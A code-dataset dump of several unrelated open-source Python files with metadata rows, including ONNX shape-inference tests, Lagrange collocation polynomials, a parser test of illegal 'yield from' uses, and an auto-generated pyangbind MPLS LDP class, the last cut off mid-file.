nodes = [make_node('Add', ['x', 'y'], 'z')]
if initializer_shape is None:
initializer = [] # type: ignore
else:
size = 1
for d in initializer_shape:
size = size * d
vals = [0.0 for i in range(size)]
initializer = [make_tensor("x", TensorProto.FLOAT, initializer_shape, vals), # type: ignore
make_tensor("y", TensorProto.FLOAT, initializer_shape, vals)]
if input_shape is None:
inputs = [] # type: ignore
else:
inputs = [helper.make_tensor_value_info('x', TensorProto.FLOAT, input_shape), # type: ignore
helper.make_tensor_value_info('y', TensorProto.FLOAT, input_shape)]
graph = helper.make_graph(nodes, "test", inputs=inputs, outputs=[], initializer=initializer, value_info=[])
return helper.make_model(graph)
def test_infer_with_initializer_without_input_above_ir4(self): # type: () -> None
# This is for testing IR>=4: some tensors can only exist in initializer and not in input
# So shape_inference should make use of initializer shapes
initializer_shape = (8, 7)
original_model = self.prepare_input_initializer_tensors(initializer_shape, None)
inferred_model = onnx.shape_inference.infer_shapes(original_model, strict_mode=True)
# If shape inference fails, it will throw IndexError
z_tenor = inferred_model.graph.value_info.pop()
z_shape = (z_tenor.type.tensor_type.shape.dim[0].dim_value, z_tenor.type.tensor_type.shape.dim[1].dim_value)
assert z_shape == initializer_shape
def test_infer_with_initializer_without_input_below_ir4(self): # type: () -> None
# This is for testing IR<4: tensors must exist both in initializer and input
# So shape_inference should not make use of initializer shapes
# Use (None, None) as empty input
initializer_shape = (8, 7)
input_shape = (None, None)
original_model = self.prepare_input_initializer_tensors(initializer_shape, input_shape)
original_model.ir_version = 3 # test ir_version < 4
inferred_model = onnx.shape_inference.infer_shapes(original_model, strict_mode=True)
z_tenor = inferred_model.graph.value_info.pop()
z_shape = (z_tenor.type.tensor_type.shape.dim[0].dim_value, z_tenor.type.tensor_type.shape.dim[1].dim_value)
# If the input is not updated by the initializer, the output shape will keep empty (0, 0)
assert z_shape == (0, 0)
def test_infer_initializer_input_mismatch(self): # type: () -> None
# Catch error if initializer and input mismatch
initializer_shape = (8, 7)
input_shape = (4, 3)
original_model = self.prepare_input_initializer_tensors(initializer_shape, input_shape)
# Inferred shape and existing shape differ in dimension 0
self.assertRaises(onnx.shape_inference.InferenceError, onnx.shape_inference.infer_shapes, original_model, strict_mode=True)
def test_infer_initializer_input_consistency_all_none(self): # type: () -> None
initializer_shape = (8, 7)
input_shape = (None, None) # accepatble
original_model = self.prepare_input_initializer_tensors(initializer_shape, input_shape)
onnx.shape_inference.infer_shapes(original_model, strict_mode=True)
def test_infer_initializer_input_consistency_single_none(self): # type: () -> None
initializer_shape = (8, 7)
input_shape = (None, 7) # accepatble
original_model = self.prepare_input_initializer_tensors(initializer_shape, input_shape)
onnx.shape_inference.infer_shapes(original_model, strict_mode=True)
def test_infer_initializer_input_consistency_differnt_rank(self): # type: () -> None
initializer_shape = (8, 7, 9)
input_shape = (None, 7) # accepatble
original_model = self.prepare_input_initializer_tensors(initializer_shape, input_shape)
# Inferred shape and existing shape differ in rank: (3) vs (2)
self.assertRaises(onnx.shape_inference.InferenceError, onnx.shape_inference.infer_shapes, original_model, strict_mode=True)
def test_trilu_upper(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5)),
('k', TensorProto.INT64, ())],
[make_node('Trilu', ['x', 'k'], ['y'])],
[],
initializer=[make_tensor('k', TensorProto.INT64, (), (2,))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, 4, 5))]) # type: ignore
def test_trilu_lower(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5)),
('k', TensorProto.INT64, ())],
[make_node('Trilu', ['x', 'k'], ['y'], upper=0)],
[],
initializer=[make_tensor('k', TensorProto.INT64, (), (10,))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, 4, 5))]) # type: ignore
def test_trilu_upper_zero(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT64, (0, 5)),
('k', TensorProto.INT64, ())],
[make_node('Trilu', ['x', 'k'], ['y'], upper=1)],
[],
initializer=[make_tensor('k', TensorProto.INT64, (), (5,))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (0, 5))]) # type: ignore
def test_trilu_lower_one(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT32, (3, 1, 5))],
[make_node('Trilu', ['x'], ['y'], upper=0)],
[],)
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT32, (3, 1, 5))]) # type: ignore
def test_batch_norm_train(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 6, 7)),
('scale', TensorProto.FLOAT, (4,)),
('b', TensorProto.FLOAT, (4,)),
('input_mean', TensorProto.FLOAT, (4,)),
('input_var', TensorProto.FLOAT, (4,))],
[make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
['out', 'output_mean', 'output_var'], training_mode=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5, 6, 7)), # type: ignore
make_tensor_value_info('output_mean', TensorProto.FLOAT, (4,)), # type: ignore
make_tensor_value_info('output_var', TensorProto.FLOAT, (4,)), # type: ignore
])
def test_batch_norm_train_dim_param(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 'C', 5, 6, 7)),
('scale', TensorProto.FLOAT, ('C',)),
('b', TensorProto.FLOAT, ('C',)),
('input_mean', TensorProto.FLOAT, ('C',)),
('input_var', TensorProto.FLOAT, ('C',))],
[make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
['out', 'output_mean', 'output_var'], training_mode=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 'C', 5, 6, 7)), # type: ignore
make_tensor_value_info('output_mean', TensorProto.FLOAT, ('C',)), # type: ignore
make_tensor_value_info('output_var', TensorProto.FLOAT, ('C',)), # type: ignore
])
def test_batch_norm_train_with_diff_type(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT16, (3, 4, 5, 6, 7)),
('scale', TensorProto.FLOAT16, (4,)),
('b', TensorProto.FLOAT16, (4,)),
('input_mean', TensorProto.FLOAT, (4,)),
('input_var', TensorProto.FLOAT, (4,))],
[make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
['out', 'output_mean', 'output_var'], training_mode=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT16, (3, 4, 5, 6, 7)), # type: ignore
make_tensor_value_info('output_mean', TensorProto.FLOAT, (4,)), # type: ignore
make_tensor_value_info('output_var', TensorProto.FLOAT, (4,)), # type: ignore
])
def test_batch_norm_test(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 6, 7)),
('scale', TensorProto.FLOAT, (4,)),
('b', TensorProto.FLOAT, (4,)),
('input_mean', TensorProto.FLOAT, (4,)),
('input_var', TensorProto.FLOAT, (4,))],
[make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
['out'], training_mode=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, 5, 6, 7))]) # type: ignore
def test_batch_norm_test_no_dim(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, None, None, None)),
('scale', TensorProto.FLOAT, (4,)),
('b', TensorProto.FLOAT, (4,)),
('input_mean', TensorProto.FLOAT, (None,)),
('input_var', TensorProto.FLOAT, (4,))],
[make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
['out'], training_mode=0)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, (3, 4, None, None, None))]) # type: ignore
def test_batch_norm_train_no_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, None),
('scale', TensorProto.FLOAT, None),
('b', TensorProto.FLOAT, None),
('input_mean', TensorProto.FLOAT, ('C',)),
('input_var', TensorProto.FLOAT, ('C',))],
[make_node('BatchNormalization', ['x', 'scale', 'b', 'input_mean', 'input_var'],
['out', 'running_mean', 'running_var'], training_mode=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.FLOAT, None), # type: ignore
make_tensor_value_info('running_mean', TensorProto.FLOAT, ('C',)), # type: ignore
make_tensor_value_info('running_var', TensorProto.FLOAT, ('C',)), # type: ignore
])
def test_nonzero(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (None,))],
[make_node('NonZero', ['x'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.INT64, (1, None))]) # type: ignore
def test_nonzero_no_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, None)],
[make_node('NonZero', ['x'], ['out'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('out', TensorProto.INT64, (None, None))]) # type: ignore
if __name__ == '__main__':
unittest.main()
| 51.967126 | 202 | 0.54921 | 21,558 | 184,951 | 4.439929 | 0.030569 | 0.137908 | 0.063469 | 0.0796 | 0.910788 | 0.884147 | 0.864777 | 0.839483 | 0.814347 | 0.793451 | 0 | 0.035201 | 0.26826 | 184,951 | 3,558 | 203 | 51.981731 | 0.672046 | 0.06718 | 0 | 0.600129 | 0 | 0 | 0.08197 | 0.002256 | 0 | 0 | 0 | 0 | 0.106246 | 1 | 0.112041 | false | 0 | 0.012556 | 0 | 0.126529 | 0.000322 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a758cd50cdfc0074a1a2835523922bebd495681 | 176 | py | Python | t_5_data_structures/t_5_1_2_using_lists_as_queues/__init__.py | naokiur/Python-tutorial | 7b03dc8fd2e5992859fde00bfe2873b4fb7ca5e5 | [
"Apache-2.0"
] | null | null | null | t_5_data_structures/t_5_1_2_using_lists_as_queues/__init__.py | naokiur/Python-tutorial | 7b03dc8fd2e5992859fde00bfe2873b4fb7ca5e5 | [
"Apache-2.0"
] | null | null | null | t_5_data_structures/t_5_1_2_using_lists_as_queues/__init__.py | naokiur/Python-tutorial | 7b03dc8fd2e5992859fde00bfe2873b4fb7ca5e5 | [
"Apache-2.0"
] | null | null | null | from collections import deque
queue = deque(["Eric", "John", "Michel"])
queue.append("Terry")
queue.append("Graham")
print(queue.popleft())
print(queue.popleft())
print(queue) | 22 | 41 | 0.721591 | 23 | 176 | 5.521739 | 0.565217 | 0.23622 | 0.267717 | 0.346457 | 0.346457 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079545 | 176 | 8 | 42 | 22 | 0.783951 | 0 | 0 | 0.285714 | 0 | 0 | 0.141243 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.428571 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
6a7c82a4a8c2dae640ab84968d58bc2e56f094ba | 37 | py | Python | BackendFunctionalModule/tracking/test_service.py | futurewei-cloud/unno | 9a320190e5efb535cb593ffc9c4ca417311be2a1 | [
"Apache-2.0"
] | 1 | 2019-12-10T03:28:17.000Z | 2019-12-10T03:28:17.000Z | BackendFunctionalModule/tracking/test_service.py | futurewei-cloud/unno | 9a320190e5efb535cb593ffc9c4ca417311be2a1 | [
"Apache-2.0"
] | 3 | 2021-05-10T21:59:10.000Z | 2022-02-18T17:15:15.000Z | BackendFunctionalModule/tracking/test_service.py | futurewei-cloud/unno | 9a320190e5efb535cb593ffc9c4ca417311be2a1 | [
"Apache-2.0"
] | null | null | null | # TODO: write a test for the service
| 18.5 | 36 | 0.72973 | 7 | 37 | 3.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216216 | 37 | 1 | 37 | 37 | 0.931034 | 0.918919 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 1 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6aa55ba8095f10d9bfef438f597d358a7e69449b | 2,182 | py | Python | capd_short/dae_v2/collocation_funcs/lagrange_f.py | BieglersGroup/dae_pyomo | e12906da66d4c3d29aa2da42d067d2649a432b96 | [
"MIT"
] | null | null | null | capd_short/dae_v2/collocation_funcs/lagrange_f.py | BieglersGroup/dae_pyomo | e12906da66d4c3d29aa2da42d067d2649a432b96 | [
"MIT"
] | null | null | null | capd_short/dae_v2/collocation_funcs/lagrange_f.py | BieglersGroup/dae_pyomo | e12906da66d4c3d29aa2da42d067d2649a432b96 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import division
from capd_short.dae_v2.collocation_funcs.cpoinsc import collptsgen
"""
Lagrange interpolating polynomials by David M Thierry
contains lgr, lgry, lgrdot, lgrydot
10/11/2016
"""
__author__ = 'David M Thierry'
def lgr(j, tau, kord, alp, bet):
tauk = collptsgen(kord, alp, bet)
tauk.reverse()
tauk.append(0.)
tauk.reverse()
out = 1
for k in range(0, kord + 1):
if j != k:
out *= (tau - tauk[k]) / (tauk[j] - tauk[k])
return out
def lgry(j, tau, kord, alp, bet):
tauk = collptsgen(kord, alp, bet)
tauk.reverse()
tauk.append(0.)
tauk.reverse()
out = 1
# for legendre [0, K-1]
if j == 0:
return 0
else:
for k in range(1, kord + 1):
if j != k:
out *= (tau - tauk[k]) / (tauk[j] - tauk[k])
return out
def lgrdot(j, tau, kord, alp, bet):
tauk = collptsgen(kord, alp, bet)
tauk.reverse()
tauk.append(0.)
tauk.reverse()
out1 = 1
for k in range(0, kord + 1):
if k != j:
out1 *= 1 / (tauk[j] - tauk[k])
out2 = 1
out3 = 0
for m in range(0, kord + 1):
if m != j:
out2 = 1 # initialize multiplication
for n in range(0, kord + 1):
if n != m and n != j:
out2 *= tau - tauk[n]
# elif n == j:
# print ("we've got a problem here")
out3 += out2
out = out3 * out1
return out
def lgrydot(j, tau, kord, alp, bet):
tauk = collptsgen(kord, alp, bet)
tauk.reverse()
tauk.append(0.)
tauk.reverse()
out1 = 1
for k in range(1, kord + 1):
if k != j:
out1 *= 1 / (tauk[j] - tauk[k])
out2 = 1
out3 = 0
for m in range(1, kord + 1):
if m != j:
out2 = 1 # initialize multiplication
for n in range(1, kord + 1):
if n != m and n != j:
out2 *= tau - tauk[n]
# elif n == j:
# print ("we've got a problem here")
out3 += out2
out = out3 * out1
return out
| 23.978022 | 66 | 0.482585 | 307 | 2,182 | 3.394137 | 0.214984 | 0.025912 | 0.076775 | 0.107486 | 0.764875 | 0.764875 | 0.761036 | 0.761036 | 0.74856 | 0.738964 | 0 | 0.049107 | 0.384051 | 2,182 | 90 | 67 | 24.244444 | 0.72619 | 0.087534 | 0 | 0.787879 | 0 | 0 | 0.008009 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.030303 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6aadbc45b83c455ccaf1d4e3d2f7589088c3a104 | 24 | py | Python | bgflow/nn/training/__init__.py | michellab/bgflow | 46c1f6035a7baabcbaee015603d08b8ce63d9717 | [
"MIT"
] | 42 | 2021-04-22T13:32:00.000Z | 2022-03-31T12:26:12.000Z | vae_lm/training/__init__.py | Nemexur/nonauto-lm | 6f237e4fc2b3b679cd92126ea5facd58d3cf6e75 | [
"Apache-2.0"
] | 29 | 2021-05-09T01:02:43.000Z | 2022-02-21T18:30:42.000Z | vae_lm/training/__init__.py | Nemexur/nonauto-lm | 6f237e4fc2b3b679cd92126ea5facd58d3cf6e75 | [
"Apache-2.0"
] | 14 | 2021-05-03T11:37:20.000Z | 2022-03-09T15:49:54.000Z | from .trainers import *
| 12 | 23 | 0.75 | 3 | 24 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 24 | 1 | 24 | 24 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6ab81635df5920a5b735866bcaacc5509d455554 | 156 | py | Python | 7KYU/int_diff.py | yaznasivasai/python_codewars | 25493591dde4649dc9c1ec3bece8191a3bed6818 | [
"MIT"
] | 4 | 2021-07-17T22:48:03.000Z | 2022-03-25T14:10:58.000Z | 7KYU/int_diff.py | yaznasivasai/python_codewars | 25493591dde4649dc9c1ec3bece8191a3bed6818 | [
"MIT"
] | null | null | null | 7KYU/int_diff.py | yaznasivasai/python_codewars | 25493591dde4649dc9c1ec3bece8191a3bed6818 | [
"MIT"
] | 3 | 2021-06-14T14:18:16.000Z | 2022-03-16T06:02:02.000Z | from itertools import combinations
def int_diff(lst: list, n: int) -> int:
return sum([1 for i in list(combinations(lst, 2)) if abs(i[0]-i[1]) == n])
| 26 | 78 | 0.653846 | 29 | 156 | 3.482759 | 0.689655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.179487 | 156 | 5 | 79 | 31.2 | 0.757813 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
6acb7edae37ca02627abe7441a5bfadbcd5be320 | 60 | py | Python | torchio/transforms/preprocessing/intensity/__init__.py | nwschurink/torchio | 9cb4319200ca328102a370d58b39be1c3b0b4cdc | [
"MIT"
] | 1 | 2021-05-18T09:36:35.000Z | 2021-05-18T09:36:35.000Z | torchio/transforms/preprocessing/intensity/__init__.py | nwschurink/torchio | 9cb4319200ca328102a370d58b39be1c3b0b4cdc | [
"MIT"
] | null | null | null | torchio/transforms/preprocessing/intensity/__init__.py | nwschurink/torchio | 9cb4319200ca328102a370d58b39be1c3b0b4cdc | [
"MIT"
] | 1 | 2022-01-12T06:41:26.000Z | 2022-01-12T06:41:26.000Z | from .normalization_transform import NormalizationTransform
| 30 | 59 | 0.916667 | 5 | 60 | 10.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 60 | 1 | 60 | 60 | 0.964286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6ad0ddf6f41eff4ba2419d03fac1f270f25d0078 | 35 | py | Python | pitop/miniscreen/__init__.py | pi-top/pi-top-Python-SDK | 6c83cc5f612d77f86f8d391c7f2924a28f7b1232 | [
"Apache-2.0"
] | 28 | 2020-11-24T08:02:58.000Z | 2022-02-27T18:37:33.000Z | pitop/miniscreen/__init__.py | pi-top/pi-top-Python-SDK | 6c83cc5f612d77f86f8d391c7f2924a28f7b1232 | [
"Apache-2.0"
] | 263 | 2020-11-10T14:35:10.000Z | 2022-03-31T12:35:13.000Z | pitop/miniscreen/__init__.py | pi-top/pi-top-Python-SDK | 6c83cc5f612d77f86f8d391c7f2924a28f7b1232 | [
"Apache-2.0"
] | 1 | 2022-01-31T22:48:35.000Z | 2022-01-31T22:48:35.000Z | from .miniscreen import Miniscreen
| 17.5 | 34 | 0.857143 | 4 | 35 | 7.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0a97a4cc7c62b81e2bd054e9db24854d87e1bd05 | 152 | py | Python | src/UnitTests/TestData/Grammar/YieldFromStmtIllegal.py | jamesralstin/python-language-server | 53eb5886776c9e75590bf2f5a787ba4015879c4d | [
"Apache-2.0"
] | 695 | 2019-05-06T23:49:37.000Z | 2022-03-30T01:56:00.000Z | src/UnitTests/TestData/Grammar/YieldFromStmtIllegal.py | jamesralstin/python-language-server | 53eb5886776c9e75590bf2f5a787ba4015879c4d | [
"Apache-2.0"
] | 1,672 | 2019-05-06T21:09:38.000Z | 2022-03-31T23:16:04.000Z | Python/Tests/TestData/Grammar/YieldFromStmtIllegal.py | RaymonGulati1/PTVS | ee1d09f2a94be4e21016f7579205bb65ec82c616 | [
"Apache-2.0"
] | 186 | 2019-05-13T03:17:37.000Z | 2022-03-31T16:24:05.000Z | yield from 1
def f():
return 42
yield from 1
def f():
yield from 1
return 42
def f():
yield from
def f():
yield from 1, 2, 3 | 10.133333 | 22 | 0.546053 | 28 | 152 | 2.964286 | 0.321429 | 0.542169 | 0.481928 | 0.46988 | 0.626506 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103093 | 0.361842 | 152 | 15 | 22 | 10.133333 | 0.752577 | 0 | 0 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a9f01f8e2ce9a244c1a27fe296a140b57b89afa | 187 | py | Python | pymcws/api/__init__.py | kenomaerz/pyMCWS | 62236956888ea69873b8d2458b52b12c598b1681 | [
"MIT"
] | 8 | 2019-03-29T02:50:43.000Z | 2022-01-28T22:45:04.000Z | pymcws/api/__init__.py | kenomaerz/pyMCWS | 62236956888ea69873b8d2458b52b12c598b1681 | [
"MIT"
] | 7 | 2019-03-29T17:55:06.000Z | 2021-12-16T21:05:50.000Z | pymcws/api/__init__.py | kenomaerz/pyMCWS | 62236956888ea69873b8d2458b52b12c598b1681 | [
"MIT"
] | 2 | 2019-03-29T14:46:41.000Z | 2020-05-21T16:37:09.000Z | from pymcws.utils import transform_unstructured_response
def alive(media_server):
response = media_server.send_request("Alive")
return transform_unstructured_response(response)
| 26.714286 | 56 | 0.823529 | 22 | 187 | 6.681818 | 0.636364 | 0.285714 | 0.394558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112299 | 187 | 6 | 57 | 31.166667 | 0.885542 | 0 | 0 | 0 | 0 | 0 | 0.026738 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
0ae61ef3062920cf67819906904a96a3a3e82676 | 24,613 | py | Python | pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v16r_1_00b/mpls_state/ldp/fec/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import ldp_fec_summary
import ldp_fec_prefixes
import ldp_fec_vcs
import ldp_fec_prefix_longer
import ldp_fec_vcid
import ldp_fec_prefix_prefix
class fec(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls-operational - based on the path /mpls-state/ldp/fec. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description:
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__ldp_fec_summary','__ldp_fec_prefixes','__ldp_fec_vcs','__ldp_fec_prefix_longer','__ldp_fec_vcid','__ldp_fec_prefix_prefix',)
_yang_name = 'fec'
_rest_name = 'fec'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__ldp_fec_prefix_longer = YANGDynClass(base=YANGListType("prefix",ldp_fec_prefix_longer.ldp_fec_prefix_longer, yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='prefix', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
self.__ldp_fec_prefix_prefix = YANGDynClass(base=ldp_fec_prefix_prefix.ldp_fec_prefix_prefix, is_container='container', presence=False, yang_name="ldp-fec-prefix-prefix", rest_name="ldp-fec-prefix-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-prefix-ldp-fec-prefix-prefix-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__ldp_fec_vcid = YANGDynClass(base=YANGListType("vc_id",ldp_fec_vcid.ldp_fec_vcid, yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='vc-id', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
